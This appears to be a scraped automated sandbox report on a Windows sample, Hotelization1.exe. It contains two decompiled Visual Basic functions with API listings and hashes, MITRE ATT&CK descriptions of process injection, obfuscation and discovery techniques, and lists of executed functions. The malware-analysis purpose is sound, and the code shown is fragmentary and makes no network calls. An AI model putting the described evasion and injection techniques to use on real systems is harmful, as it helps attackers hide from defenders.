Uniqueness Score: -1.00%

Function 0040E89F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040E89F(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				signed int _v32;
				signed int _v44;
				signed int _t26;
				void* _t37;
				void* _t39;
				intOrPtr _t40;

				_t40 = _t39 - 0xc;
				 *[fs:0x0] = _t40;
				L004012A0();
				_v16 = _t40;
				_v12 = 0x401230;
				_v8 = 0;
				_t26 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x14,  *[fs:0x0], 0x4012a6, _t37);
				L00401420();
				_push(0);
				_push(0xffffffff);
				_push(1);
				_push(0);
				_push(0x40b284);
				_push(_v28);
				L00401366();
				L0040145C();
				_push(_v28);
				_push(0x40b28c);
				L00401360();
				if(_t26 != 0) {
					_t26 =  *((intOrPtr*)( *_a4 + 0x718))(_a4);
					_v32 = _t26;
					if(_v32 >= 0) {
						_v44 = _v44 & 0x00000000;
					} else {
						_push(0x718);
						_push(0x40ae70);
						_push(_a4);
						_push(_v32);
						L004013D8();
						_v44 = _t26;
					}
				}
				_push(E0040E95F);
				L00401462();
				return _t26;
			}

0x0040e8a2
0x0040e8b1
0x0040e8bb
0x0040e8c3
0x0040e8c6
0x0040e8cd
0x0040e8dc
0x0040e8e7
0x0040e8ec
0x0040e8ee
0x0040e8f0
0x0040e8f2
0x0040e8f4
0x0040e8f9
0x0040e8fc
0x0040e906
0x0040e90b
0x0040e90e
0x0040e913
0x0040e91a
0x0040e924
0x0040e92a
0x0040e931
0x0040e94d
0x0040e933
0x0040e933
0x0040e938
0x0040e93d
0x0040e940
0x0040e943
0x0040e948
0x0040e948
0x0040e931
0x0040e951
0x0040e959
0x0040e95e

APIs

__vbaChkstk.MSVBVM60(?,004012A6), ref: 0040E8BB
__vbaStrCopy.MSVBVM60(?,?,?,?,004012A6), ref: 0040E8E7
#712.MSVBVM60(?,0040B284,00000000,00000001,000000FF,00000000,?,?,?,?,004012A6), ref: 0040E8FC
__vbaStrMove.MSVBVM60(?,0040B284,00000000,00000001,000000FF,00000000,?,?,?,?,004012A6), ref: 0040E906
__vbaStrCmp.MSVBVM60(0040B28C,?,?,0040B284,00000000,00000001,000000FF,00000000,?,?,?,?,004012A6), ref: 0040E913
__vbaHresultCheckObj.MSVBVM60(00000000,00401230,0040AE70,00000718), ref: 0040E943
__vbaFreeStr.MSVBVM60(0040E95F,0040B28C,?,?,0040B284,00000000,00000001,000000FF,00000000,?,?,?,?,004012A6), ref: 0040E959

Strings

cer, xrefs: 0040E8DF

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$#712CheckChkstkCopyFreeHresultMove
String ID: cer
API String ID: 1147057769-324084633
Opcode ID: c8d8292fe7211c37a0fc911143f90cc83e9477cb7a640ee9e3f29db6b9049be6
Instruction ID: 95e0d473530d62d8ca3aa71f01168864d6391888d7cae65790fc690841aaea84
Opcode Fuzzy Hash: c8d8292fe7211c37a0fc911143f90cc83e9477cb7a640ee9e3f29db6b9049be6
Instruction Fuzzy Hash: ED110A70940209ABDB00AFA6C846F9E7FB4EB04754F50807AF505BA2E1D77895518B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040F109, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040F109(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v44;
				intOrPtr _v52;
				char _v60;
				char _v76;
				intOrPtr _v116;
				char _v124;
				short _v128;
				short _t30;
				short _t33;
				void* _t37;
				void* _t39;
				intOrPtr _t40;

				_t40 = _t39 - 0xc;
				 *[fs:0x0] = _t40;
				L004012A0();
				_v16 = _t40;
				_v12 = 0x401288;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x70,  *[fs:0x0], 0x4012a6, _t37);
				 *_a8 =  *_a8 & 0x00000000;
				_v52 = 0x20;
				_v60 = 2;
				_push( &_v60);
				_push(1);
				_push( &_v76);
				L0040133C();
				_v116 = 0x40b314;
				_v124 = 0x8008;
				_push( &_v76);
				_t30 =  &_v124;
				_push(_t30);
				L004013F0();
				_v128 = _t30;
				_push( &_v76);
				_push( &_v60);
				_push(2);
				L00401432();
				_t33 = _v128;
				if(_t33 != 0) {
					_push(0x42);
					L00401336();
					_v44 = _t33;
				}
				_push(E0040F1E0);
				return _t33;
			}

0x0040f10c
0x0040f11b
0x0040f125
0x0040f12d
0x0040f130
0x0040f137
0x0040f146
0x0040f14c
0x0040f14f
0x0040f156
0x0040f160
0x0040f161
0x0040f166
0x0040f167
0x0040f16c
0x0040f173
0x0040f17d
0x0040f17e
0x0040f181
0x0040f182
0x0040f187
0x0040f18e
0x0040f192
0x0040f193
0x0040f195
0x0040f19d
0x0040f1a3
0x0040f1a5
0x0040f1a7
0x0040f1ac
0x0040f1ac
0x0040f1af
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004012A6), ref: 0040F125
#607.MSVBVM60(?,00000001,00000002), ref: 0040F167
__vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040F182
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008008,?), ref: 0040F195
#570.MSVBVM60(00000042,?,?,004012A6), ref: 0040F1A7

Strings

, xrefs: 0040F14F

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$#570#607ChkstkFreeList
String ID:
API String ID: 1644359802-3916222277
Opcode ID: 43026c539bb3498ddc22dfca216e6c840f050ce8f2632a212e513725732aeee1
Instruction ID: 201cf46cd234ed111fd9bcaa97c480cfc0944423d60ed6fc9246f4bf87ef0eae
Opcode Fuzzy Hash: 43026c539bb3498ddc22dfca216e6c840f050ce8f2632a212e513725732aeee1
Instruction Fuzzy Hash: AF11D7B1900208ABEB10DFA5C846BDEBBB8EF04704F50417AF904BB291D77899498B99

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Hotelization1.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

System Behavior

Analysis Process: Hotelization1.exe PID: 3360 Parent PID: 5636

General

Chronological Activities

Disassembly

Code Analysis

Analysis Process: Hotelization1.exe PID: 3360 Parent PID: 5636 Hotelization1.exeCOMMON

Executed Functions

Function 0040250C, Relevance: 1.7, APIs: 1, Instructions: 468memoryCOMMON

Function 0040274C, Relevance: 1.7, APIs: 1, Instructions: 467COMMON

Function 004024B5, Relevance: 1.7, APIs: 1, Instructions: 453memoryCOMMON

Function 00402609, Relevance: 1.7, APIs: 1, Instructions: 448memoryCOMMON

Function 00402659, Relevance: 1.7, APIs: 1, Instructions: 440
memoryCOMMONCrypto

Function 00402564, Relevance: 1.7, APIs: 1, Instructions: 428
memoryCOMMONCrypto

Function 004027C8, Relevance: 1.6, APIs: 1, Instructions: 367
COMMONCrypto

Function 004027B6, Relevance: 1.6, APIs: 1, Instructions: 365
COMMONCrypto

Function 004028EF, Relevance: 1.6, APIs: 1, Instructions: 363
memoryCOMMONCrypto

Function 004027A7, Relevance: 1.6, APIs: 1, Instructions: 362
COMMONCrypto

Function 0040C0EA, Relevance: 241.4, APIs: 129, Strings: 8, Instructions: 1630
COMMON

Function 0040EBE8, Relevance: 35.1, APIs: 15, Strings: 5, Instructions: 95
COMMON

Function 004027B2, Relevance: 1.7, APIs: 1, Instructions: 464
COMMON

Function 004027F0, Relevance: 1.7, APIs: 1, Instructions: 434
COMMON

Function 004027E4, Relevance: 1.6, APIs: 1, Instructions: 377
COMMON

Function 004027CC, Relevance: 1.6, APIs: 1, Instructions: 365
COMMON

Function 004027B8, Relevance: 1.6, APIs: 1, Instructions: 365
COMMON

Function 004027CE, Relevance: 1.6, APIs: 1, Instructions: 364
COMMON

Function 004027BC, Relevance: 1.6, APIs: 1, Instructions: 362
COMMON

Function 004027BE, Relevance: 1.6, APIs: 1, Instructions: 361
COMMON

Function 004027C0, Relevance: 1.6, APIs: 1, Instructions: 360
COMMON

Function 004027AC, Relevance: 1.6, APIs: 1, Instructions: 360
COMMON

Function 004027C2, Relevance: 1.6, APIs: 1, Instructions: 359
memoryCOMMON

Function 004027AE, Relevance: 1.6, APIs: 1, Instructions: 359
memoryCOMMON

Function 004027C4, Relevance: 1.6, APIs: 1, Instructions: 357
memoryCOMMON

Function 004027B0, Relevance: 1.6, APIs: 1, Instructions: 357
memoryCOMMON

Function 004027C6, Relevance: 1.6, APIs: 1, Instructions: 356
memoryCOMMON

Function 004027CA, Relevance: 1.6, APIs: 1, Instructions: 355
memoryCOMMON

Function 004027B4, Relevance: 1.6, APIs: 1, Instructions: 355
memoryCOMMON

Function 00402BDD, Relevance: 1.6, APIs: 1, Instructions: 338
memoryCOMMON

Function 00402A38, Relevance: 1.6, APIs: 1, Instructions: 328
COMMON

Function 00402CCB, Relevance: 1.6, APIs: 1, Instructions: 315
memoryCOMMON

Function 00402AEA, Relevance: 1.6, APIs: 1, Instructions: 307
memoryCOMMON

Function 00402C80, Relevance: 1.5, APIs: 1, Instructions: 270
memoryCOMMON

Function 00402E6D, Relevance: 1.5, APIs: 1, Instructions: 240
memoryCOMMON

Function 00402F14, Relevance: 1.5, APIs: 1, Instructions: 228
memoryCOMMON